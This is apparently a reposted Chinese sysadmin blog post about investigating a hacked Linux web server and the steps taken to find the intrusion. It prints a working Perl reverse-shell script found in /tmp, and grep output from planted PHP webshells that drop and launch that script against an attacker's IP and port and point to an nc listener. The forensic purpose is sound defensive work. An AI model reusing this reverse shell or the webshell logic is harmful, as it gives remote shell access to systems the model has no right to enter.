Web服务器捉虫速记

一服务器疑似被挂马，现象是从百度搜该站点，出来的结果大部分为色情网站。

马上登录服务器（半夜好困啊）。执行如下的步骤：

1、 检查系统帐号，看有没有异常帐号--如冒充系统帐号，改一个字母，看起来像系统帐号，混淆视听。有的家伙狡猾的干活，创建个帐号为“…”极端不易察觉。

2、 检查最近登录用户的ip：last 查看9月9号以后到目前的情况，经确认，有一个ip来路不对。

3、 检查系统初始化文件inittab,运行级别为3，为发现异常。一些hacker喜欢在这里下手，加上respawn这样的行，保证他的程序被杀后自动重启，不屈不挠地抗争系统管理员的绞杀。

4、 检查运行级别目录的脚本，ls –al /etc/rc3.d ,未见异常。

5、 检查自动任务 crontab –l ，root用户和web运行用户www各检查一遍，未见任何异常。

6、 检查历史记录history 发现有安装sendmail的情形，问客户是否有这个，答：不是自己装的。

7、 检查web目录，发现其权限为777，这可让人不太放心了，心中猜想，可能是从这里下手了。

8、 检查一下目录/tmp,发现有个文件不太对劲，文件名是spider_bc，打开看一下，是个perl脚本，其内容为：

[root@localhost mysql]# more /tmp/spider_bc

#!/usr/bin/perl

use Socket;

$cmd= "lynx";

$system= 'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$ARGV[0];

$port=$ARGV[1];

$iaddr=inet_aton($target) || die("Error: $!\n");

$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system($system);

close(STDIN);

close(STDOUT);

close(STDERR);

据客户开发人员反应，这文件删除以后，一会又自动生成了。

9、 初步怀疑是hacker利用web权限设置及程序漏洞上传了程序后，自动生成这个文件，于是进入到网站根目录，然后执行grep –r “spider” * ,片刻，结果出来了，下面节录部分：

[root@localhost www]# grep spider_bc * -r

/plusbak/viev.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功 ' : '创建/tmp/spider_bc失败 ';

/plusbak/viev.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/plusbak/viev.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功 ' : '创建/tmp/spider_bc.c失败 ';

/plusbak/viev.php:@unlink('/tmp/spider_bc.c');

/plusbak/viev.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功 ' : '创建/tmp/spider_bc失败 ';

/developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功 ' : '创建/tmp/spider_bc.c失败 ';

/developers/FCKeditor/editor/skins/images/images.php:@unlink('/tmp/spider_bc.c');

/developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功 ' : '创建/tmp/spider_bc失败 ';

/developers/developers/cache/default/index_sql.php :echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功 ' : '创建/tmp/spider_bc.c失败 ';

/developers/developers/cache/default/index_sql.php :@unlink('/tmp/spider_bc.c');

/developers/developers/cache/default/index_sql.php :echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

9、问题基本查明，告知各方，先简单恢复，明日再战。

本文出自 “sery” 博客，请务必保留此出处http://sery.blog.51cto.com/10037/666829

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/404889.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！